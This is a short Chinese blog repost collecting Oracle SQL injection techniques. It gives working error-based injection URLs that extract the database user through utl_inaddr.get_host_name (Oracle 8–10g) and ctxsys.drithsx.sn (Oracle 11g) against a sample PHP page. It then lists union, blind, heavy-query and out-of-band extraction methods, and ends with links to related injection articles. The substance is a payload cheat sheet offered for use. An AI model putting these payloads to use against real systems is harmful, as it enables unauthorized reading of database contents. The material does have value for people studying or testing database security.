Oracle 注入技巧收集

Posted 信息安全爱好者

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Oracle 注入技巧收集相关的知识,希望对你有一定的参考价值。

---恢复内容开始---

一、报错注入

(1)爆用户名(适用于:Oracle8,9和10g):

http://192.168.2.10/ora2.php?name=1 and 1=utl_inaddr.get_host_name((select user from dual))--

(2)基于报错注入(适用于Oracle 11g)取信息:

ctxsys.drithsx.sn(1,(SQL语句))

例如:

http://192.168.2.10/ora1.php?name= and 1 = ctxsys.drithsx.sn(1,(select user from dual))--

二、无报错信息

可通过以下几种方式来实现提取数据:

  (1)联合查询;

  (2)盲注;

  (3)Heavy Queries

  (4)Out Of Band Channels(带外通道)

 

---恢复内容结束---

以上是关于Oracle 注入技巧收集的主要内容,如果未能解决你的问题,请参考以下文章

自己收集的一些常见SQL注入方式(持续更新)

精华 | SQL注入万能Bypass技巧

oralce报错注入(转自某个奇安信大佬)

SQLServer注入技巧

SQLServer注入技巧

sql注入进阶-报错注入盲注order by注入二次注入SQL注入绕过速查表